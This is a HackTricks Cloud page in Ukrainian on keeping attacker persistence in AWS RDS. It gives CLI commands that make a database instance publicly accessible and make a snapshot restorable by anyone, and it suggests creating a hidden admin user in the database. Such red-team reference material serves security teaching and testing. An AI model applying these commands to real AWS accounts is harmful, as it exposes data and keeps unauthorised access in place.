AWS - RDS Persistence

Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!

Інші способи підтримки HackTricks:

Якщо ви хочете побачити рекламу вашої компанії на HackTricks або завантажити HackTricks у форматі PDF, перевірте ПЛАНИ ПІДПИСКИ!
Отримайте офіційний PEASS & HackTricks мерч
Відкрийте для себе Сім'ю PEASS, нашу колекцію ексклюзивних NFT
Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами на Twitter 🐦 @hacktricks_live.
Поділіться своїми хакерськими трюками, надсилайте PR до HackTricks і HackTricks Cloud репозиторіїв на GitHub.

RDS

Для отримання додаткової інформації перевірте:

pageAWS - Relational Database (RDS) Enum

Зробити екземпляр доступним для загального доступу: `rds:ModifyDBInstance`

Атакувальник з цим дозволом може змінити існуючий екземпляр RDS, щоб увімкнути загальний доступ.

aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately

Створення адміністратора користувача всередині БД

Атакуючий може просто створити користувача всередині БД, тому навіть якщо пароль основного користувача змінено, він не втрачає доступ до бази даних.

Зробити знімок загальнодоступним

aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all

Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!

Інші способи підтримки HackTricks:

Якщо ви хочете побачити вашу компанію рекламовану на HackTricks або завантажити HackTricks у форматі PDF, перевірте ПЛАНИ ПІДПИСКИ!
Отримайте офіційний PEASS & HackTricks мерч
Відкрийте для себе Сім'ю PEASS, нашу колекцію ексклюзивних NFT
Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами на Twitter 🐦 @hacktricks_live.
Поділіться своїми хакерськими трюками, надсилайте PR до HackTricks і HackTricks Cloud репозиторіїв на GitHub.

PreviousAWS - Lightsail Persistence NextAWS - S3 Persistence

Last updated 1 month ago